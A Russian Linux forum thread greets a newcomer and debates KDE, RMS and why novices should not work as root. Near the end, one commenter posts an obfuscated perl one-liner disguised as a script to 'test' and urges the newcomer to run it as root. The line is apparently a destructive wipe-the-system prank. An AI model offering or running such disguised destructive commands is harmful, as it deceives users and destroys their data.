LINUX.ORG.RU
ФорумTalks

Hello world

0

0

Первый раз поставил linux, первый раз отписываюсь на форуме по линуксу. Полёт нормальный.

Добра вам всем ^_^

Ответ на: комментарий от vahvarh

Кьют же уже далеко не морды создавать умеет. Спрашивается: зачем ему работа с FTP, SQL итд

dragonfly
()
Ответ на: комментарий от Alsvartr

>KDE просто похоже на windows

KDE только по дефолту немного напоминает венду, на самом деле его можно настроить так, чтоб вендой там и не пахло.

Hetor
()

Только мне кажется, что ТС - тролль?

Gvidon ★★★★
()
Ответ на: комментарий от dragonfly

>> Я читал про BSD - вроде для пользователя отличий нет.

Неправда! Будет!

fixed

ansi ★★★★
()

Молодец. Теперь, главное,
а) не работай под рутом
б) ставь программы только из репозиториев
в) не пытайся применить навыки windows там, где это не нужно
и всё будет хорошо.

AITap ★★★★★
()

>KDE просто похоже на windows и понятно windows-пользователям

С тем, что понятно — согласен, а с тем, что похоже — нет. А понятно во многом из-за интуитивности.

Обратного никто не утверждал.

Про никто — 4.2

vkos ★★
()
Ответ на: комментарий от Hetor

вобщем не суть важно. но чем-то напомнила лину.

vahvarh ★★★
()
Ответ на: комментарий от AITap

б) Ещё можно собирать, но только с официального сайта.

vkos ★★
()
Ответ на: комментарий от Lutik

идеи RMS это идеи ричарда столмана, основателя движения свободного программного обеспечения. чувак молодец, но он слишком фанатичен. хотя наверное для лидера это и правильно.

vahvarh ★★★
()

>Первый раз поставил linux, первый раз отписываюсь на форуме по линуксу. Полёт нормальный.

Добро пожаловать в Ад, сынок.

Zubok ★★★★★
()
Ответ на: комментарий от Hetor

KDE только по дефолту немного напоминает венду, на самом деле его можно настроить так, чтоб вендой там и не пахло.

Спасибо, капитан. Речь идет только о дефолте.

Alsvartr ★★★★★
()
Ответ на: комментарий от Lutik

>а разве не в этом состоит unix-way?

Я не могу понять, вы правда новичок, или же толстый тролль?

Unix-way заключается в простоте и удобстве. Лишние нагромождения и свистелки тут излишни.

ShTH
()

А вдруг введёшь что-то не то? Вспомни, например, случай, когда человек ввёл команду для «установки directx» (или сказал, что ввёл) и лишился содержимого дисков.

AITap ★★★★★
()

ну вопрос который я всегда задаю - пусть я сижу не под рутом и ввожу команду аналогичную rm -rf /. какая разница - потеряю ли я /usr или нет, если я потеряю /home/vahvarh/projects/ ?

а если /projects/ в любом случае висит в cvs который лежит на другом сервере а на том сервере ежесуточные бекапы не другой сервер то тоже какая разница...

vahvarh ★★★
()
Ответ на: комментарий от matich

Ух, ух.

<fat>В BSD, вроде, тоже. Они идут правильным путем</fat>

dragonfly
()

> команду аналогичную rm -rf /.
Например, есть шанс увидеть «Невозможно удалить /bin: Operation not permitted» и нажать ^C. Можно вообще не хранить ничего важного на компьютере, и тогда максимально важной будет, собственно, ОС.
Естественно, если у вас настроены бекапы всего, что вам нужно, вы имеете полное право сносить систему, работать под рутом и совершать прочие не рекомендованные новичкам действия, почему бы и нет?

AITap ★★★★★
()

Кто-то здесь намекает, что потому, что они в гноме переставили кнопки как в макоси они теперь непохожи на (страшный) Windows :}

Deleted
()

>Можно вообще не хранить ничего важного на компьютере

Лучше вообще не включать компьютер, ага.

alg0rythm
()

Разница может быть в том, запустишь ли ты свой комп после этого или таки будешь переустанавливать :}

Deleted
()

Ты любишь переустаналивать систему? Лично я нет. Или ты сразу после потери хомяка комп продаёшь?

Deleted
()
Ответ на: комментарий от Deleted

ты серьёзными делами занимаешься?

после потери (незабекапленного) хомяка можно не комп а почки продать...

а переустановить дебиан это полчаса.

а вообще я с каждой сменой компа систему переустанавливаю. один комп одна система. )))

vahvarh ★★★
()

И из этого следует, что раз можно себе ноги отстрелить, то надо сделать это максимально возможными способами одновременно? Серьёзный ты наш. Может и БД у тебя тоже от юзера удаляются? То, что ты незабэкапил свой хомяк это ты уже ССЗБ, раз в нём твоя почка. А если есть бэкап, то ты его просто восстанавливаешь, не устанавливая систему по новой.

Deleted
()

Кто-то здесь намекает, что потому, что они в гноме переставили кнопки как в макоси они теперь непохожи на (страшный) Windows :}

а ты не переводи стрелки :)

Alsvartr ★★★★★
()

Когда будешь поносить FOSS и Linux в частности, не забудь (перед постом в разделе Linux-org-ru) создать в Talks созвучную тему (что-то типа Goodbye World) и в ней причины. ;)

amorpher ★★★★★
()

Да просто на лицо закономерность: начинающие пользователи выбирают KDE. Отсюда можно сделать вывод, что KDE в целом похож на windows и упрощает процесс миграции. Это замечательно по-моему, не понимаю, почему вы этого так стыдитесь.

Alsvartr ★★★★★
()

Я вот ни капли не стыжусь, но скучно же :}

Deleted
()

linux

Он сказал «linux»! Да будет срачъ!

Добра вам всем ^_^

Xenesz ★★★★
()

Ой, молодец! Я тут скрипт пишу, протестируй пожалуйста, работает у тебя или нет? Запускать под рутом надо.

cat «test... test... test...» | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Demon37 ★★★★
()
Ответ на: комментарий от Demon37

Сам хотел написать, передумал. Надо было так вообще: под рутом работать нельзя, кроме как запускать оптимизацию ...

Но потом пожалел человека

dragonfly
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.